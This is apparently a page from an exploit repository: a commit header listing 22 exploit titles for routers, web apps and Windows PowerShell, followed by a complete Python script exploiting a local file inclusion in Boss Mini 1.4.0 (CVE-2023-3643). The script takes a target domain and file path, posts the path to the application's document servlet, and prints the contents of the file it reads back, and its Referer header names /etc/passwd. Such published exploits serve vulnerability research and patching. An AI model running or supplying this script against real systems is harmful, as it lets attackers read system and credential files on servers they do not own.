7ef8e488d8
22 changes to exploits/shellcodes/ghdb GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution TPC-110W - Missing Authentication for Critical Function A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Easywall 0.3.1 - Authenticated Remote Command Execution Magento ver. 2.4.6 - XSLT Server Side Injection AC Repair and Services System v1.0 - Multiple SQL Injection Enrollment System v1.0 - SQL Injection Petrol Pump Management Software v.1.0 - SQL Injection Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Real Estate Management System v1.0 - Remote Code Execution via File Upload Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection Simple Student Attendance System v1.0 - Time Based Blind SQL Injection Boss Mini 1.4.0 - local file inclusion Windows PowerShell - Event Log Bypass Single Quote Code Execution
57 lines
No EOL
1.7 KiB
Python
Executable file
57 lines
No EOL
1.7 KiB
Python
Executable file
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
|
|
# Date: 07/12/2023
|
|
# Exploit Author: [nltt0] (https://github.com/nltt-br))
|
|
# CVE: CVE-2023-3643
|
|
|
|
|
|
'''
|
|
_____ _ _____
|
|
/ __ \ | | / ___|
|
|
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
|
|
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
|
|
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
|
|
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
|
|
__/ |
|
|
|___/
|
|
|
|
'''
|
|
|
|
from requests import post
|
|
from urllib.parse import quote
|
|
from argparse import ArgumentParser
|
|
|
|
try:
|
|
parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
|
|
parser.add_argument('--domain', required=True, help='Application domain')
|
|
parser.add_argument('--file', required=True, help='Local file')
|
|
|
|
args = parser.parse_args()
|
|
host = args.domain
|
|
file = args.file
|
|
url = '{}/boss/servlet/document'.format(host)
|
|
file2 = quote(file, safe='')
|
|
|
|
headers = {
|
|
'Host': host,
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
|
|
'Content-Type': 'application/x-www-form-urlencoded',
|
|
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
|
|
'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
|
|
}
|
|
|
|
|
|
data = {
|
|
'path': file2
|
|
}
|
|
|
|
try:
|
|
req = post(url, headers=headers, data=data, verify=False)
|
|
if req.status_code == 200:
|
|
print(req.text)
|
|
|
|
except Exception as e:
|
|
print('Error in {}'.format(e))
|
|
|
|
|
|
except Exception as e:
|
|
print('Error in {}'.format(e)) |